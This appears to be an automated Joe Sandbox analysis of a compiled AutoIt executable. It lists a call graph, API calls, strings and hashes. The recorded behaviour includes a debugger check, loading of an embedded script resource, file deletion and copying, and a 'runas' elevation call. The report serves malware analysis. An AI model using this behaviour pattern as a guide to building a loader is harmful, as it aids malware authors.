GetPEB 100563->100569 100565 d4068b 100565->100551 100567 d422a9 Sleep 100566->100567 100568 d422b7 100567->100568 100570 d4349a 100569->100570 100570->100565 100571 e11066 100576 e1f8cf 100571->100576 100573 e1106c 100574 e32f80 __cinit 67 API calls 100573->100574 100575 e11076 100574->100575 100577 e1f8f0 100576->100577 100609 e30143 100577->100609 100581 e1f937 100582 e177c7 59 API calls 100581->100582 100583 e1f941 100582->100583 100584 e177c7 59 API calls 100583->100584 100585 e1f94b 100584->100585 100586 e177c7 59 API calls 100585->100586 100587 e1f955 100586->100587 100588 e177c7 59 API calls 100587->100588 100589 e1f993 100588->100589 100590 e177c7 59 API calls 100589->100590 100591 e1fa5e 100590->100591 100619 e260e7 100591->100619 100595 e1fa90 100596 e177c7 59 API calls 100595->100596 100597 e1fa9a 100596->100597 100647 e2ffde 100597->100647 100599 e1fae1 100600 e1faf1 GetStdHandle 100599->100600 100601 e549d5 100600->100601 100602 e1fb3d 100600->100602 100601->100602 100604 e549de 100601->100604 100603 e1fb45 OleInitialize 100602->100603 100603->100573 100654 e76dda 64 API calls Mailbox 100604->100654 100606 e549e5 100655 e774a9 CreateThread 100606->100655 100608 e549f1 CloseHandle 100608->100603 100656 e3021c 100609->100656 100612 e3021c 59 API calls 100613 e30185 100612->100613 100614 e177c7 59 API calls 100613->100614 100615 e30191 100614->100615 100616 e17d2c 59 API calls 100615->100616 100617 e1f8f6 100616->100617 100618 e303a2 6 API calls 100617->100618 100618->100581 100620 e177c7 59 API calls 100619->100620 100621 e260f7 100620->100621 100622 e177c7 59 API calls 100621->100622 100623 e260ff 100622->100623 100663 e25bfd 100623->100663 100626 e25bfd 59 API calls 100627 e2610f 100626->100627 100628 e177c7 59 API calls 100627->100628 100629 e2611a 100628->100629 100630 e30ff6 Mailbox 59 API calls 100629->100630 100631 e1fa68 100630->100631 100632 e26259 100631->100632 100633 e26267 100632->100633 100634 e177c7 59 API calls 100633->100634 100635 e26272 100634->100635 100636 e177c7 59 API calls 100635->100636 100637 e2627d 100636->100637 100638 e177c7 59 API calls 100637->100638 100639 e26288 100638->100639 100640 e177c7 59 API calls 100639->100640 100641 e26293 100640->100641 100642 e25bfd 59 API calls 100641->100642 100643 e2629e 100642->100643 100644 e30ff6 Mailbox 59 API calls 100643->100644 100645 e262a5 RegisterWindowMessageW 100644->100645 100645->100595 100648 e65cc3 100647->100648 100649 e2ffee 100647->100649 100666 e79d71 60 API calls 100648->100666 100650 e30ff6 Mailbox 59 API calls 100649->100650 100652 e2fff6 100650->100652 100652->100599 100653 e65cce 100654->100606 100655->100608 100667 e7748f 65 API calls 100655->100667 100657 e177c7 59 API calls 100656->100657 100658 e30227 100657->100658 100659 e177c7 59 API calls 100658->100659 100660 e3022f 100659->100660 100661 e177c7 59 API calls 100660->100661 100662 e3017b 100661->100662 100662->100612 100664 e177c7 59 API calls 100663->100664 100665 e25c05 100664->100665 100665->100626 100666->100653 100668 e11016 100673 e14ad2 100668->100673 100671 e32f80 __cinit 67 API calls 100672 e11025 100671->100672 100674 e30ff6 Mailbox 59 API calls 100673->100674 100675 e14ada 100674->100675 100677 e1101b 100675->100677 100680 e14a94 100675->100680 100677->100671 100681 e14aaf 100680->100681 100682 e14a9d 100680->100682 100684 e14afe 100681->100684 100683 e32f80 __cinit 67 API calls 100682->100683 100683->100681 100685 e177c7 59 API calls 100684->100685 100686 e14b16 GetVersionExW 100685->100686 100687 e17d2c 59 API calls 100686->100687 100688 e14b59 100687->100688 100689 e17e8c 59 API calls 100688->100689 100692 e14b86 100688->100692 100690 e14b7a 100689->100690 100691 e17886 59 API calls 100690->100691 100691->100692 100693 e14bf1 GetCurrentProcess IsWow64Process 100692->100693 100695 e4dc8d 100692->100695 100694 e14c0a 100693->100694 100696 e14c20 100694->100696 100697 e14c89 GetSystemInfo 100694->100697 100708 e14c95 100696->100708 100698 e14c56 100697->100698 100698->100677 100701 e14c32 100703 e14c95 2 API calls 100701->100703 100702 e14c7d GetSystemInfo 100704 e14c47 100702->100704 100705 e14c3a GetNativeSystemInfo 100703->100705 100704->100698 100706 e14c4d FreeLibrary 100704->100706 100705->100704 100706->100698 100709 e14c2e 100708->100709 100710 e14c9e LoadLibraryA 100708->100710 100709->100701 100709->100702 100710->100709 100711 e14caf GetProcAddress 100710->100711 100711->100709 100712 e1e70b 100715 e1d260 100712->100715 100714 e1e719 100716 e1d27d 100715->100716 100744 e1d4dd 100715->100744 100717 e52abb 100716->100717 100718 e52b0a 100716->100718 100747 e1d2a4 100716->100747 100720 e52abe 100717->100720 100728 e52ad9 100717->100728 100759 e8a6fb 341 API calls __cinit 100718->100759 100722 e52aca 100720->100722 100720->100747 100757 e8ad0f 341 API calls 100722->100757 100725 e32f80 __cinit 67 API calls 100725->100747 100726 e52cdf 100726->100726 100727 e1d6ab 100727->100714 100728->100744 100758 e8b1b7 341 API calls 3 library calls 100728->100758 100729 e1d594 100751 e18bb2 68 API calls 100729->100751 100733 e52c26 100763 e8aa66 89 API calls 100733->100763 100734 e1d5a3 100734->100714 100737 e18620 69 API calls 100737->100747 100744->100727 100764 e7a0b5 89 API calls 4 library calls 100744->100764 100745 e1a000 341 API calls 100745->100747 100746 e181a7 59 API calls 100746->100747 100747->100725 100747->100727 100747->100729 100747->100733 100747->100737 100747->100744 100747->100745 100747->100746 100749 e188a0 68 API calls __cinit 100747->100749 100750 e186a2 68 API calls 100747->100750 100752 e1859a 68 API calls 100747->100752 100753 e1d0dc 341 API calls 100747->100753 100754 e19f3a 59 API calls Mailbox 100747->100754 100755 e1d060 89 API calls 100747->100755 100756 e1cedd 341 API calls 100747->100756 100760 e18bb2 68 API calls 100747->100760 100761 e19e9c 60 API calls Mailbox 100747->100761 100762 e66d03 60 API calls 100747->100762 100749->100747 100750->100747 100751->100734 100752->100747 100753->100747 100754->100747 100755->100747 100756->100747 100757->100727 100758->100744 100759->100747 100760->100747 100761->100747 100762->100747 100763->100744 100764->100726 100765 e1568a 100766 e15c18 59 API calls 100765->100766 100767 e1569c 100766->100767 100768 e15632 61 API calls 100767->100768 100769 e156aa 100768->100769 100771 e156ba Mailbox 100769->100771 100772 e181c1 61 API calls Mailbox 100769->100772 100772->100771 100773 e1107d 100778 e171eb 100773->100778 100775 e1108c 100776 e32f80 __cinit 67 API calls 100775->100776 100777 e11096 100776->100777 100779 e171fb __write_nolock 100778->100779 100780 e177c7 59 API calls 100779->100780 100781 e172b1 100780->100781 100782 e14864 61 API calls 100781->100782 100783 e172ba 100782->100783 100809 e3074f 100783->100809 100786 e17e0b 59 API calls 100787 e172d3 100786->100787 100788 e13f84 59 API calls 100787->100788 100789 e172e2 100788->100789 100790 e177c7 59 API calls 100789->100790 100791 e172eb 100790->100791 100792 e17eec 59 API calls 100791->100792 100793 e172f4 RegOpenKeyExW 100792->100793 100794 e4ecda RegQueryValueExW 100793->100794 100798 e17316 Mailbox 100793->100798 100795 e4ecf7 100794->100795 100796 e4ed6c RegCloseKey 100794->100796 100797 e30ff6 Mailbox 59 API calls 100795->100797 100796->100798 100806 e4ed7e _wcscat Mailbox __wsetenvp 100796->100806 100799 e4ed10 100797->100799 100798->100775 100800 e1538e 59 API calls 100799->100800 100801 e4ed1b RegQueryValueExW 100800->100801 100803 e4ed38 100801->100803 100805 e4ed52 100801->100805 100802 e17b52 59 API calls 100802->100806 100804 e17d2c 59 API calls 100803->100804 100804->100805 100805->100796 100806->100798 100806->100802 100807 e17f41 59 API calls 100806->100807 100808 e13f84 59 API calls 100806->100808 100807->100806 100808->100806 100810 e41b90 __write_nolock 100809->100810 100811 e3075c GetFullPathNameW 100810->100811 100812 e3077e 100811->100812 100813 e17d2c 59 API calls 100812->100813 100814 e172c5 100813->100814 100814->100786

                                            Executed Functions

                                            Function 00E13B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E13B7A
                                            • IsDebuggerPresent.KERNEL32 ref: 00E13B8C
                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00ED62F8,00ED62E0,?,?), ref: 00E13BFD
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                              • Part of subcall function 00E20A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E13C26,00ED62F8,?,?,?), ref: 00E20ACE
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E13C81
                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EC93F0,00000010), ref: 00E4D4BC
                                            • SetCurrentDirectoryW.KERNEL32(?,00ED62F8,?,?,?), ref: 00E4D4F4
                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EC5D40,00ED62F8,?,?,?), ref: 00E4D57A
                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E4D581
                                              • Part of subcall function 00E13A58: GetSysColorBrush.USER32(0000000F), ref: 00E13A62
                                              • Part of subcall function 00E13A58: LoadCursorW.USER32(00000000,00007F00), ref: 00E13A71
                                              • Part of subcall function 00E13A58: LoadIconW.USER32(00000063), ref: 00E13A88
                                              • Part of subcall function 00E13A58: LoadIconW.USER32(000000A4), ref: 00E13A9A
                                              • Part of subcall function 00E13A58: LoadIconW.USER32(000000A2), ref: 00E13AAC
                                              • Part of subcall function 00E13A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E13AD2
                                              • Part of subcall function 00E13A58: RegisterClassExW.USER32(?), ref: 00E13B28
                                              • Part of subcall function 00E139E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E13A15
                                              • Part of subcall function 00E139E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E13A36
                                              • Part of subcall function 00E139E7: ShowWindow.USER32(00000000,?,?), ref: 00E13A4A
                                              • Part of subcall function 00E139E7: ShowWindow.USER32(00000000,?,?), ref: 00E13A53
                                              • Part of subcall function 00E143DB: _memset.LIBCMT ref: 00E14401
                                              • Part of subcall function 00E143DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E144A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                            • String ID: This is a third-party compiled AutoIt script.$runas$%
                                            • API String ID: 529118366-3343222573
                                            • Opcode ID: 45ad467af04a9b953a1e595ffa6efb226095095d5b2767e9922fd2e3696bf9ba
                                            • Instruction ID: dcb3deff507db5a2ca50844901e9f0ecb9f52d0dc526809069a138b34a65acdb
                                            • Opcode Fuzzy Hash: 45ad467af04a9b953a1e595ffa6efb226095095d5b2767e9922fd2e3696bf9ba
                                            • Instruction Fuzzy Hash: 21511D70904248AECF11EBB5EC06EEDBBB5EF45704F006167F461B22B2DB74468ACB61
                                            Function 00E14FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 984 e14fe9-e15001 CreateStreamOnHGlobal 985 e15021-e15026 984->985 986 e15003-e1501a FindResourceExW 984->986 987 e15020 986->987 988 e4dd5c-e4dd6b LoadResource 986->988 987->985 988->987 989 e4dd71-e4dd7f SizeofResource 988->989 989->987 990 e4dd85-e4dd90 LockResource 989->990 990->987 991 e4dd96-e4ddb4 990->991 991->987
                                            APIs
                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E14EEE,?,?,00000000,00000000), ref: 00E14FF9
                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E14EEE,?,?,00000000,00000000), ref: 00E15010
                                            • LoadResource.KERNEL32(?,00000000,?,?,00E14EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E14F8F), ref: 00E4DD60
                                            • SizeofResource.KERNEL32(?,00000000,?,?,00E14EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E14F8F), ref: 00E4DD75
                                            • LockResource.KERNEL32(N,?,?,00E14EEE,?,?,00000000,00000000,?,?,?,?,?,?,00E14F8F,00000000), ref: 00E4DD88
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                            • String ID: SCRIPT$N
                                            • API String ID: 3051347437-3852340653
                                            • Opcode ID: 539ad1e65c798e201ce57bf978d0969db94f374d26fafee0a8d7cf2e05be2a57
                                            • Instruction ID: 9b3a6865f7467b190613757fd0c3707fa126013c5cfe0c49d2f94b8bf707ce01
                                            • Opcode Fuzzy Hash: 539ad1e65c798e201ce57bf978d0969db94f374d26fafee0a8d7cf2e05be2a57
                                            • Instruction Fuzzy Hash: E0117075200700BFD7218B66DC58FA77BBAEBC9B11F20456EF405E6260DB71EC448660
                                            Function 00E14AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1048 e14afe-e14b5e call e177c7 GetVersionExW call e17d2c 1053 e14b64 1048->1053 1054 e14c69-e14c6b 1048->1054 1056 e14b67-e14b6c 1053->1056 1055 e4db90-e4db9c 1054->1055 1057 e4db9d-e4dba1 1055->1057 1058 e14c70-e14c71 1056->1058 1059 e14b72 1056->1059 1061 e4dba4-e4dbb0 1057->1061 1062 e4dba3 1057->1062 1060 e14b73-e14baa call e17e8c call e17886 1058->1060 1059->1060 1070 e14bb0-e14bb1 1060->1070 1071 e4dc8d-e4dc90 1060->1071 1061->1057 1064 e4dbb2-e4dbb7 1061->1064 1062->1061 1064->1056 1066 e4dbbd-e4dbc4 1064->1066 1066->1055 1068 e4dbc6 1066->1068 1072 e4dbcb-e4dbce 1068->1072 1070->1072 1073 e14bb7-e14bc2 1070->1073 1074 e4dc92 1071->1074 1075 e4dca9-e4dcad 1071->1075 1076 e14bf1-e14c08 GetCurrentProcess IsWow64Process 1072->1076 1077 e4dbd4-e4dbf2 1072->1077 1078 e4dc13-e4dc19 1073->1078 1079 e14bc8-e14bca 1073->1079 1080 e4dc95 1074->1080 1082 e4dcaf-e4dcb8 1075->1082 1083 e4dc98-e4dca1 1075->1083 1084 e14c0a 1076->1084 1085 e14c0d-e14c1e 1076->1085 1077->1076 1081 e4dbf8-e4dbfe 1077->1081 1090 e4dc23-e4dc29 1078->1090 1091 e4dc1b-e4dc1e 1078->1091 1086 e14bd0-e14bd3 1079->1086 1087 e4dc2e-e4dc3a 1079->1087 1080->1083 1088 e4dc00-e4dc03 1081->1088 1089 e4dc08-e4dc0e 1081->1089 1082->1080 1092 e4dcba-e4dcbd 1082->1092 1083->1075 1084->1085 1093 e14c20-e14c30 call e14c95 1085->1093 1094 e14c89-e14c93 GetSystemInfo 1085->1094 1095 e14bd9-e14be8 1086->1095 1096 e4dc5a-e4dc5d 1086->1096 1098 e4dc44-e4dc4a 1087->1098 1099 e4dc3c-e4dc3f 1087->1099 1088->1076 1089->1076 1090->1076 1091->1076 1092->1083 1107 e14c32-e14c3f call e14c95 1093->1107 1108 e14c7d-e14c87 GetSystemInfo 1093->1108 1097 e14c56-e14c66 1094->1097 1102 e4dc4f-e4dc55 1095->1102 1103 e14bee 1095->1103 1096->1076 1101 e4dc63-e4dc78 1096->1101 1098->1076 1099->1076 1105 e4dc82-e4dc88 1101->1105 1106 e4dc7a-e4dc7d 1101->1106 1102->1076 1103->1076 1105->1076 1106->1076 1113 e14c41-e14c45 GetNativeSystemInfo 1107->1113 1114 e14c76-e14c7b 1107->1114 1110 e14c47-e14c4b 1108->1110 1110->1097 1112 e14c4d-e14c50 FreeLibrary 1110->1112 1112->1097 1113->1110 1114->1113
                                            APIs
                                            • GetVersionExW.KERNEL32(?), ref: 00E14B2B
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            • GetCurrentProcess.KERNEL32(?,00E9FAEC,00000000,00000000,?), ref: 00E14BF8
                                            • IsWow64Process.KERNEL32(00000000), ref: 00E14BFF
                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00E14C45
                                            • FreeLibrary.KERNEL32(00000000), ref: 00E14C50
                                            • GetSystemInfo.KERNEL32(00000000), ref: 00E14C81
                                            • GetSystemInfo.KERNEL32(00000000), ref: 00E14C8D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                            • String ID:
                                            • API String ID: 1986165174-0
                                            • Opcode ID: caa33cf056423117e2a895b5b6c8eae1b7bb7b0ef351e642c0f8654e72490b8f
                                            • Instruction ID: 950dad286685b7741ae2f6b76e9691b941394fba5fdc57f50453ff5e7ad36036
                                            • Opcode Fuzzy Hash: caa33cf056423117e2a895b5b6c8eae1b7bb7b0ef351e642c0f8654e72490b8f
                                            • Instruction Fuzzy Hash: DB91C47154EBC4DEC731CB6894915EAFFE4AF26304B485D9ED0CBA3B41D220E988C759
                                            Function 00E1E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Dt$Dt$Dt$Dt$Variable must be of type 'Object'.
                                            • API String ID: 0-3952547859
                                            • Opcode ID: f467e89da1f964772bcba8f56b6775421f57257ede619b774bf3de4504106f8f
                                            • Instruction ID: bf363ab7efbfbdbc0720407961811d0e22b8831ea5aa079e9adcb21055b7fd19
                                            • Opcode Fuzzy Hash: f467e89da1f964772bcba8f56b6775421f57257ede619b774bf3de4504106f8f
                                            • Instruction Fuzzy Hash: A6A25A74A04205CFCB24CF54C880AE9B7B2FF48308F689469ED56BB351D771AD86CB91
                                            Function 00E74696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,00E4E7C1), ref: 00E746A6
                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00E746B7
                                            • FindClose.KERNEL32(00000000), ref: 00E746C7
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: FileFind$AttributesCloseFirst
                                            • String ID:
                                            • API String ID: 48322524-0
                                            • Opcode ID: ad2ecd34260a03a2c47039c122b1195cc4fbc20dc3798d54fe4b867fc2edece3
                                            • Instruction ID: edbcec0bd68d0d57b0d1435aa32429a3fe8406560a8da48f82396dcc9acf453d
                                            • Opcode Fuzzy Hash: ad2ecd34260a03a2c47039c122b1195cc4fbc20dc3798d54fe4b867fc2edece3
                                            • Instruction Fuzzy Hash: CCE0D8B14104005F4610A778EC4D8EA775C9F06335F104717F839E10F0E7B059548695
                                            Function 00E20B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E20BBB
                                            • timeGetTime.WINMM ref: 00E20E76
                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E20FB3
                                            • TranslateMessage.USER32(?), ref: 00E20FC7
                                            • DispatchMessageW.USER32(?), ref: 00E20FD5
                                            • Sleep.KERNEL32(0000000A), ref: 00E20FDF
                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00E2105A
                                            • DestroyWindow.USER32 ref: 00E21066
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E21080
                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00E552AD
                                            • TranslateMessage.USER32(?), ref: 00E5608A
                                            • DispatchMessageW.USER32(?), ref: 00E56098
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E560AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr$pr$pr$pr
                                            • API String ID: 4003667617-1825247661
                                            • Opcode ID: fca782ca98d701e9422eac8deb916c5d934c448ac28fbb271ec9b080cd484d72
                                            • Instruction ID: f810b3fb553b487fd2e95feef6f74f68355eead92365feaec341988ac48ece40
                                            • Opcode Fuzzy Hash: fca782ca98d701e9422eac8deb916c5d934c448ac28fbb271ec9b080cd484d72
                                            • Instruction Fuzzy Hash: 1BB2C771608741DFD724DF24D894BAAB7E5FF84304F14591EE89AB72A2D770E888CB42
                                            Function 00E793DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00E791E9: __time64.LIBCMT ref: 00E791F3
                                              • Part of subcall function 00E15045: _fseek.LIBCMT ref: 00E1505D
                                            • __wsplitpath.LIBCMT ref: 00E794BE
                                              • Part of subcall function 00E3432E: __wsplitpath_helper.LIBCMT ref: 00E3436E
                                            • _wcscpy.LIBCMT ref: 00E794D1
                                            • _wcscat.LIBCMT ref: 00E794E4
                                            • __wsplitpath.LIBCMT ref: 00E79509
                                            • _wcscat.LIBCMT ref: 00E7951F
                                            • _wcscat.LIBCMT ref: 00E79532
                                              • Part of subcall function 00E7922F: _memmove.LIBCMT ref: 00E79268
                                              • Part of subcall function 00E7922F: _memmove.LIBCMT ref: 00E79277
                                            • _wcscmp.LIBCMT ref: 00E79479
                                              • Part of subcall function 00E799BE: _wcscmp.LIBCMT ref: 00E79AAE
                                              • Part of subcall function 00E799BE: _wcscmp.LIBCMT ref: 00E79AC1
                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E796DC
                                            • _wcsncpy.LIBCMT ref: 00E7974F
                                            • DeleteFileW.KERNEL32(?,?), ref: 00E79785
                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E7979B
                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E797AC
                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E797BE
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                            • String ID:
                                            • API String ID: 1500180987-0
                                            • Opcode ID: acac4255d358f5c2868ae6a0a1d0fa8611951b2c587e6053f757c9f17d076931
                                            • Instruction ID: 6b7127e8fe06ecbccee9d30ac8b44b4140d12e95a9fd87ee79e15d00b501b666
                                            • Opcode Fuzzy Hash: acac4255d358f5c2868ae6a0a1d0fa8611951b2c587e6053f757c9f17d076931
                                            • Instruction Fuzzy Hash: 21C11DB1900219AEDF11DF95CC85ADEBBBDAF45310F0050AAF609F7151DB709A848F65
                                            Function 00E13015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E13074
                                            • RegisterClassExW.USER32(00000030), ref: 00E1309E
                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E130AF
                                            • InitCommonControlsEx.COMCTL32(?), ref: 00E130CC
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E130DC
                                            • LoadIconW.USER32(000000A9), ref: 00E130F2
                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E13101
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
